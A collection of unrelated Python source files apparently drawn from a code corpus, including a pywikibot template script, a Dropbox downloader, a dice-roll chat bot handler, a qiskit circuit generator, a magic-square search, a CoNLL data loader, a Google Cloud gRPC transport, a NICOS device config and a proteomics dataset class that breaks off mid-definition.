def add_template(self, source, dest, task, fromsite):
"""Place or remove the Link_GA/FA template on/from a page."""
def compile_link(site, templates):
"""Compile one link template list."""
findtemplate = '(%s)' % '|'.join(templates)
return re.compile(r'\{\{%s\|%s\}\}'
% (findtemplate.replace(' ', '[ _]'),
site.code), re.IGNORECASE)
tosite = dest.site
add_tl, remove_tl = self.getTemplateList(tosite.code, task)
re_link_add = compile_link(fromsite, add_tl)
re_link_remove = compile_link(fromsite, remove_tl)
text = dest.text
m1 = add_tl and re_link_add.search(text)
m2 = remove_tl and re_link_remove.search(text)
changed = False
interactive = self.getOption('interactive')
if add_tl:
if m1:
pywikibot.output('(already added)')
else:
# insert just before interwiki
if (not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
if self.getOption('side'):
# Placing {{Link FA|xx}} right next to
# corresponding interwiki
text = (text[:m1.end()]
+ ' {{%s|%s}}' % (add_tl[0], fromsite.code)
+ text[m1.end():])
else:
# Moving {{Link FA|xx}} to top of interwikis
iw = textlib.getLanguageLinks(text, tosite)
text = textlib.removeLanguageLinks(text, tosite)
text += '%s{{%s|%s}}%s' % (
config.LS, add_tl[0], fromsite.code, config.LS)
text = textlib.replaceLanguageLinks(text,
iw, tosite)
changed = True
if remove_tl:
if m2:
if (changed # Don't force the user to say "Y" twice
or not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
text = re.sub(re_link_remove, '', text)
changed = True
elif task == 'former':
pywikibot.output('(already removed)')
if changed:
comment = i18n.twtranslate(tosite, 'featured-' + task,
{'page': source})
try:
dest.put(text, comment)
self._save_counter += 1
except pywikibot.LockedPage:
pywikibot.output('Page %s is locked!'
% dest.title())
except pywikibot.PageNotSaved:
pywikibot.output('Page not saved')
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: unicode
"""
options = {}
local_args = pywikibot.handle_args(args)
issue_deprecation_warning(
'featured.py script', 'Wikibase Client extension',
0, UserWarning, since='20160307')
for arg in local_args:
if arg.startswith('-fromlang:'):
options[arg[1:9]] = arg[10:].split(',')
elif arg.startswith('-after:'):
options['afterpage'] = arg[7:]
elif arg.startswith('-nocache:'):
options[arg[1:8]] = arg[9:].split(',')
else:
options[arg[1:].lower()] = True
bot = FeaturedBot(**options)
bot.run()
if __name__ == '__main__':
main()
|
the-stack_0_12335 | # -*- coding: utf-8 -*-
import urllib3
from dropbox import client, rest
import os
class DropboxDownloader:
def __init__(self, token_path):
self.api_client = None
urllib3.disable_warnings()
self.__oauth2(token_path)
def __oauth2(self, token_path):
with open(token_path) as f:
serialized_token = f.read()
if serialized_token.startswith('oauth2:'):
access_token = serialized_token[len('oauth2:'):]
self.api_client = client.DropboxClient(access_token)
else:
print('token error')
def do_ls(self):
resp = self.api_client.metadata('')
file_list = []
if 'contents' in resp:
for f in resp['contents']:
name = os.path.basename(f['path'])
file_list.append(name)
return file_list
def do_get(self, from_path, to_path):
to_file = open(to_path, "wb")
f, metadata = self.api_client.get_file_and_metadata(from_path)
#print 'Metadata:', metadata
to_file.write(f.read())
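

# Hedged usage sketch: the token path and file names are hypothetical; the token
# file must contain a string of the form "oauth2:<access token>".
if __name__ == '__main__':
    dl = DropboxDownloader('dropbox_token.txt')
    for name in dl.do_ls():
        print(name)
    dl.do_get('/report.csv', 'report.csv')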
|
the-stack_0_12336 | import re
from nonebot import on_message, on_command
from nonebot.adapters import Bot, Event
from nonebot.log import logger
from nonebot.adapters.cqhttp.permission import GROUP
from nonebot.adapters.cqhttp.message import Message
from nonebot.rule import regex
from .common import START, SEP, CONF
from .roll import roll
RE_ROLL_STR = (
"^(" # 1
+ START
+ CONF.i7s_roll_command
+ " |"
+ CONF.i7s_roll_trigger
# 2 3 4 5 6
+ r" )([0-9adgimnsuvx+\- ]+)( ?(结果)?(大于|小于|大于等于|小于等于|>=|>|<|<=) ?(-?\d{1,10}))?"
)
RE_ROLL_CMD = re.compile(RE_ROLL_STR)
async def roll_command_handler(bot: Bot, event: Event, state: dict):
messages = []
logger.info(f"[7sRoll] received roll command: {event.raw_message}")
if await GROUP(bot, event):
messages.append(f"[CQ:at,qq={event.user_id}]")
match = None
if "_match" in state:
match = state["_matched"]
else:
args = str(event.raw_message).strip()
match = RE_ROLL_CMD.match(args)
if not match:
messages.append("roll 命令格式错误")
messages.append("格式为:roll <表达式>[ <判断方式><目标>]")
messages.append("表达式举例:3d6+1d3-1")
messages.append("判断方式可选:>, <, <=, >=, 或对应中文")
messages.append("目标:需要达成的点数")
return await cmd_roll.finish(Message("\n".join(messages)))
if match.group(1) is None:
return
expr_str, op_str, target = match.group(2, 5, 6)
messages.extend(roll(expr_str, op_str, target))
return await cmd_roll.finish(Message("\n".join(messages)))
cmd_roll = on_command(CONF.i7s_roll_command, priority=1, block=True)
cmd_roll.handle()(roll_command_handler)
message_cmd_roll = on_message(rule=regex(RE_ROLL_STR), priority=2, block=True)
message_cmd_roll.handle()(roll_command_handler)
|
the-stack_0_12337 | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=23
prog.rx(-0.6848671984825748,input_qubit[1]) # number=26
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.h(input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=17
prog.h(input_qubit[3]) # number=37
prog.cz(input_qubit[0],input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=39
prog.x(input_qubit[3]) # number=31
prog.cx(input_qubit[0],input_qubit[3]) # number=32
prog.h(input_qubit[3]) # number=33
prog.cz(input_qubit[0],input_qubit[3]) # number=34
prog.h(input_qubit[3]) # number=35
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[3],input_qubit[0]) # number=20
prog.z(input_qubit[3]) # number=21
prog.h(input_qubit[0]) # number=27
prog.cz(input_qubit[3],input_qubit[0]) # number=28
prog.h(input_qubit[0]) # number=29
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.h(input_qubit[1]) # number=36
prog.y(input_qubit[2]) # number=11
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit2535.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
the-stack_0_12340 | #coding:latin-1
class CarreMagique :
def __init__(self, coef) :
self.mat = [ [ coef[i+j*3] for i in range(3) ] for j in range(3) ]
def __str__(self) :
return "\n".join ( [ ",".join( [ str(n) for n in row ] ) for row in self.mat ] )
def __add__ (self, carre) :
coef = []
for i in range(3) :
for j in range(3) :
coef.append ( self.mat[i][j] + carre.mat[i][j])
return CarreMagique(coef)
def somme_ligne_colonne_diagonale(self):
tout = [ sum ( ligne ) for ligne in self.mat ] + \
[ sum ( [ self.mat[i][j] for j in range(3) ] ) for i in range(3) ] + \
[ sum ( [ self.mat[i][i] for i in range(3) ] ) ] + \
[ sum ( [ self.mat[2-i][i] for i in range(3) ] ) ]
return tout
def coefficient_unique(self):
d = { }
for ligne in self.mat :
for c in ligne :
d [c] = d.get(c,0) + 1
return len(d) == 9
def est_magique(self):
unique = self.coefficient_unique()
if not unique : return False
somme = self.somme_ligne_colonne_diagonale()
return min(somme) == max(somme)
def tous_les_carres_permutation_ligne12_meme_somme( permut = None, pos = 0):
if pos == 9 :
carre = CarreMagique (permut)
if carre.est_magique() :
#print (carre)
#print ()
return [ carre ]
else :
return []
else :
        if pos >= 6 :  # added
            if sum ( permut[:3]) != sum(permut[3:6]) :  # added
                return [ ]  # added
res = [ ]
if permut == None :
permut = [ i+1 for i in range(9) ]
for i in range (pos,9) :
            # swap elements i and pos
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
            res += tous_les_carres_permutation_ligne12_meme_somme(permut, pos+1) # changed
            # undo the swap (restore the original order)
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
return res
import time
d = time.perf_counter()
res = tous_les_carres_permutation_ligne12_meme_somme()
d = time.perf_counter() - d
print ("nombre de carr�s", len(res), " en ", d)
|
the-stack_0_12341 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
import codecs
import collections
import torch
import pickle
import utils
import torch.nn as nn
class Loader():
def __init__(self, target_dir):
self.target_dir = target_dir
self.char2idx = collections.defaultdict(int)
self.label2idx = {'O': 0, 'I': 1, 'B': 2}
def load(self,
data_file,
make_word_dict):
with codecs.open(data_file, 'r', 'utf-8') as r:
lines = r.readlines()
# Converting format
data_features, data_labels = read_corpus(lines)
if make_word_dict:
self.char2idx = make_dic(self.char2idx, doc_sent=data_features)
unk_char_id = len(self.char2idx) - 1
unk_label_id = len(self.label2idx) - 1
sents_idx = [[[self.char2idx.get(char, unk_char_id) for char in word] \
for word in sent] \
for sent in data_features]
'''
        Sample of the data when the training data is the toy corpus
'''
'''
defaultdict(<class 'int'>, {'e': 0, 'a': 1, 'i': 2, 't': 3, 's': 4, 'n': 5,
'r': 6, 'o': 7, 'h': 8, 'd': 9, 'l': 10, 'c': 11, 'u': 12, 'm': 13, 'p': 14,
'g': 15, 'f': 16, 'y': 17, 'w': 18, '.': 19, 'S': 20, 'T': 21, 'b': 22, 'E': 23,
'I': 24, 'A': 25, 'v': 26, ',': 27, 'N': 28, '1': 29, 'P': 30, 'k': 31, 'R': 32,
'L': 33, '-': 34, '0': 35, '9': 36, 'O': 37, '2': 38, 'B': 39, 'G': 40, 'C': 41,
'M': 42, 'D': 43, 'U': 44, 'F': 45, '6': 46, 'K': 47, "'": 48, '"': 49, '5': 50,
'H': 51, 'q': 52, 'W': 53, 'J': 54, '4': 55, '7': 56, '3': 57, '8': 58, 'x': 59,
'Y': 60, 'V': 61, 'j': 62, '(': 63, ')': 64, '$': 65, '/': 66, '=': 67, 'z': 68,
'+': 69, 'X': 70, 'Q': 71, '&': 72, 'Z': 73, ':': 74, '<unk>': 75})
'''
#print(data_features)
'''
[['EU', 'rejects', 'German', 'call', 'to', 'boycott', 'British', 'lamb', '.'],
['Peter', 'Blackburn'], ...
'''
#print(sents_idx)
'''
[[[23, 44], [6, 0, 62, 0, 11, 3, 4], [40, 0, 6, 13, 1, 5], [11, 1, 10, 10],
[3, 7], [22, 7, 17, 11, 7, 3, 3], [39, 6, 2, 3, 2, 4, 8], [10, 1, 13, 22], [19]],
[[30, 0, 3, 0, 6], [39, 10, 1, 11, 31, 22, 12, 6, 5]], ...
'''
labels_idx = [[self.label2idx.get(label, unk_label_id) for label in labels] \
for labels in data_labels]
#print(labels_idx)
'''
[[1, 0, 1, 0, 0, 0, 1, 0, 0],
[1, 1], ...
'''
pickle.dump([self.char2idx, self.label2idx, sents_idx, labels_idx],
open(self.target_dir + "CoNLL_char_" + data_file[19:] + ".pkl", "wb"))
def read_corpus(lines):
"""
convert corpus into features and labels
"""
features = list()
labels = list()
tmp_fl = list()
tmp_ll = list()
for line in lines:
if not (line.isspace() or (len(line) > 10 and line[0:10] == '-DOCSTART-')):
line = line.rstrip('\n').split()
tmp_fl.append(line[0])
tmp_ll.append(line[-1][0])
elif len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
tmp_fl = list()
tmp_ll = list()
if len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
return features, labels
def make_dic(char2idx, doc_sent):
    # sort characters by frequency and assign ids
words = utils.flatten(doc_sent)
chars = utils.flatten(words)
counter = collections.Counter()
counter.update(chars)
cnt = 0
for char, count in counter.most_common():
        # only add characters that occur at least once to the dictionary
if count >= 1:
char2idx[char] = cnt
cnt += 1
char2idx[u'<unk>'] = len(char2idx)
return char2idx
def main():
torch.manual_seed(1)
TARGET_DIR = '../corpus/data/'
GLOVE_FILE = '../corpus/glove.6B/glove.6B.50d.txt'
#TRAIN_FILE = TARGET_DIR + 'eng.train' # 14041 sentences
#TEST_FILE = TARGET_DIR + 'eng.test'
TRAIN_FILE = TARGET_DIR + 'toy.train' # 143 sentences
TEST_FILE = TARGET_DIR + 'toy.test'
#TRAIN_FILE = TARGET_DIR + 'mid.train' # 3153 sentences
#TEST_FILE = TARGET_DIR + 'mid.test'
EMBEDDING_DIM = 50
loader = Loader(target_dir=TARGET_DIR)
    # build the character dictionary when loading the training data
loader.load(data_file=TRAIN_FILE,
make_word_dict=True)
    # do not build the dictionary when loading the test data
loader.load(data_file=TEST_FILE,
make_word_dict=None)
if __name__ == '__main__':
main()
|
the-stack_0_12343 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.servicedirectory_v1beta1.types import lookup_service
from .base import LookupServiceTransport, DEFAULT_CLIENT_INFO
class LookupServiceGrpcTransport(LookupServiceTransport):
"""gRPC backend transport for LookupService.
Service Directory API for looking up service data at runtime.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def resolve_service(
self,
) -> Callable[
[lookup_service.ResolveServiceRequest], lookup_service.ResolveServiceResponse
]:
r"""Return a callable for the resolve service method over gRPC.
Returns a
[service][google.cloud.servicedirectory.v1beta1.Service] and its
associated endpoints. Resolving a service is not considered an
active developer method.
Returns:
Callable[[~.ResolveServiceRequest],
~.ResolveServiceResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "resolve_service" not in self._stubs:
self._stubs["resolve_service"] = self.grpc_channel.unary_unary(
"/google.cloud.servicedirectory.v1beta1.LookupService/ResolveService",
request_serializer=lookup_service.ResolveServiceRequest.serialize,
response_deserializer=lookup_service.ResolveServiceResponse.deserialize,
)
return self._stubs["resolve_service"]
def close(self):
self.grpc_channel.close()
__all__ = ("LookupServiceGrpcTransport",)
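

# Hedged usage sketch (not part of the generated code): the high-level
# LookupServiceClient normally builds this transport itself, but it can be
# passed explicitly. The project/namespace/service name below is hypothetical
# and valid Google Cloud credentials are assumed.
#
#   from google.cloud import servicedirectory_v1beta1
#
#   client = servicedirectory_v1beta1.LookupServiceClient(
#       transport=LookupServiceGrpcTransport()
#   )
#   request = servicedirectory_v1beta1.ResolveServiceRequest(
#       name="projects/my-project/locations/us-central1/namespaces/my-ns/services/my-svc"
#   )
#   response = client.resolve_service(request=request)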
|
the-stack_0_12345 | description = 'FRM II neutron guide line 2b shutter'
group = 'lowlevel'
includes = ['guidehall']
tango_base = 'tango://ictrlfs.ictrl.frm2:10000/mlz/'
devices = dict(
NL2b = device('nicos.devices.tango.NamedDigitalInput',
description = 'NL2b shutter status',
mapping = {'closed': 0,
'open': 1},
pollinterval = 60,
maxage = 120,
tangodevice = tango_base + 'shutter/nl2b',
),
)
|
the-stack_0_12346 | import natsort
import numpy as np
import pandas as pd
import plotly.io as pio
import plotly.express as px
import plotly.graph_objects as go
import plotly.figure_factory as ff
import re
import traceback
from io import BytesIO
from sklearn.decomposition import PCA
from sklearn.metrics import pairwise as pw
import json
import statistics
import matplotlib.pyplot as plt
import matplotlib_venn as venn
from matplotlib_venn import venn2, venn3, venn3_circles
from PIL import Image
from upsetplot import from_memberships
from upsetplot import plot as upplot
import pkg_resources
def natsort_index_keys(x):
order = natsort.natsorted(np.unique(x.values))
return pd.Index([order.index(el) for el in x], name=x.name)
def natsort_list_keys(x):
order = natsort.natsorted(np.unique(x))
return [order.index(el) for el in x]
class SpatialDataSet:
regex = {
"imported_columns": "^[Rr]atio H/L (?!normalized|type|is.*|variability|count)[^ ]+|^Ratio H/L variability.... .+|^Ratio H/L count .+|id$|[Mm][Ss].*[cC]ount.+$|[Ll][Ff][Qq].*|.*[nN]ames.*|.*[Pp][rR]otein.[Ii][Dd]s.*|[Pp]otential.[cC]ontaminant|[Oo]nly.[iI]dentified.[bB]y.[sS]ite|[Rr]everse|[Ss]core|[Qq]-[Vv]alue|R.Condition|PG.Genes|PG.ProteinGroups|PG.Cscore|PG.Qvalue|PG.RunEvidenceCount|PG.Quantity|^Proteins$|^Sequence$"
}
acquisition_set_dict = {
"LFQ6 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"LFQ6 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"SILAC - MQ" : [ "[Rr]atio.[Hh]/[Ll](?!.[Vv]aria|.[Cc]ount)","[Rr]atio.[Hh]/[Ll].[Vv]ariability.\[%\]", "[Rr]atio.[Hh]/[Ll].[cC]ount"],
"Custom": ["(?!Protein IDs|Gene names)"]
}
Spectronaut_columnRenaming = {
"R.Condition": "Map", "PG.Genes" : "Gene names", "PG.Qvalue": "Q-value", "PG.Cscore":"C-Score",
"PG.ProteinGroups" : "Protein IDs", "PG.RunEvidenceCount" : "MS/MS count", "PG.Quantity" : "LFQ intensity"
}
css_color = ["#b2df8a", "#6a3d9a", "#e31a1c", "#b15928", "#fdbf6f", "#ff7f00", "#cab2d6", "#fb9a99", "#1f78b4", "#ffff99", "#a6cee3",
"#33a02c", "blue", "orange", "goldenrod", "lightcoral", "magenta", "brown", "lightpink", "red", "turquoise",
"khaki", "darkgoldenrod","darkturquoise", "darkviolet", "greenyellow", "darksalmon", "hotpink", "indianred", "indigo","darkolivegreen",
"coral", "aqua", "beige", "bisque", "black", "blanchedalmond", "blueviolet", "burlywood", "cadetblue", "yellowgreen", "chartreuse",
"chocolate", "cornflowerblue", "cornsilk", "darkblue", "darkcyan", "darkgray", "darkgrey", "darkgreen", "darkkhaki", "darkmagenta",
"darkorange", "darkorchid", "darkred", "darkseagreen", "darkslateblue", "snow", "springgreen", "darkslategrey", "mediumpurple", "oldlace",
"olive", "lightseagreen", "deeppink", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"lightgoldenrodyellow", "lightgray", "lightgrey", "lightgreen", "lightsalmon", "lightskyblue", "lightslategray", "lightslategrey",
"lightsteelblue", "lightyellow", "lime", "limegreen", "linen", "maroon", "mediumaquamarine", "mediumblue", "mediumseagreen",
"mediumslateblue", "mediumspringgreen", "mediumturquoise", "mediumvioletred", "midnightblue", "mintcream", "mistyrose", "moccasin",
"olivedrab", "orangered", "orchid", "palegoldenrod", "palegreen", "paleturquoise", "palevioletred", "papayawhip", "peachpuff", "peru",
"pink", "plum", "powderblue", "rosybrown", "royalblue", "saddlebrown", "salmon", "sandybrown", "seagreen", "seashell", "sienna", "silver",
"skyblue", "slateblue", "steelblue", "teal", "thistle", "tomato", "violet", "wheat", "white", "whitesmoke", "slategray", "slategrey",
"aquamarine", "azure","crimson", "cyan", "darkslategray", "grey","mediumorchid","navajowhite", "navy"]
analysed_datasets_dict = {}
df_organellarMarkerSet = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/organellemarkers/{}.csv'.format("Homo sapiens - Uniprot")),
usecols=lambda x: bool(re.match("Gene name|Compartment", x)))
df_organellarMarkerSet = df_organellarMarkerSet.rename(columns={"Gene name":"Gene names"})
df_organellarMarkerSet = df_organellarMarkerSet.astype({"Gene names": "str"})
def __init__(self, filename, expname, acquisition, comment, name_pattern="e.g.:.* (?P<cond>.*)_(?P<rep>.*)_(?P<frac>.*)", reannotate_genes=False, **kwargs):
self.filename = filename
self.expname = expname
self.acquisition = acquisition
self.name_pattern = name_pattern
self.comment = comment
self.imported_columns = self.regex["imported_columns"]
self.fractions, self.map_names = [], []
self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
if acquisition == "SILAC - MQ":
if "RatioHLcount" not in kwargs.keys():
self.RatioHLcount = 2
else:
self.RatioHLcount = kwargs["RatioHLcount"]
del kwargs["RatioHLcount"]
if "RatioVariability" not in kwargs.keys():
self.RatioVariability = 30
else:
self.RatioVariability = kwargs["RatioVariability"]
del kwargs["RatioVariability"]
elif acquisition == "Custom":
self.custom_columns = kwargs["custom_columns"]
self.custom_normalized = kwargs["custom_normalized"]
self.imported_columns = "^"+"$|^".join(["$|^".join(el) if type(el) == list else el for el in self.custom_columns.values() if el not in [[], None, ""]])+"$"
#elif acquisition == "LFQ5 - MQ" or acquisition == "LFQ6 - MQ" or acquisition == "LFQ6 - Spectronaut" or acquisition == "LFQ5 - Spectronaut":
else:
if "summed_MSMS_counts" not in kwargs.keys():
self.summed_MSMS_counts = 2
else:
self.summed_MSMS_counts = kwargs["summed_MSMS_counts"]
del kwargs["summed_MSMS_counts"]
if "consecutiveLFQi" not in kwargs.keys():
self.consecutiveLFQi = 4
else:
self.consecutiveLFQi = kwargs["consecutiveLFQi"]
del kwargs["consecutiveLFQi"]
#self.markerset_or_cluster = False if "markerset_or_cluster" not in kwargs.keys() else kwargs["markerset_or_cluster"]
if "organism" not in kwargs.keys():
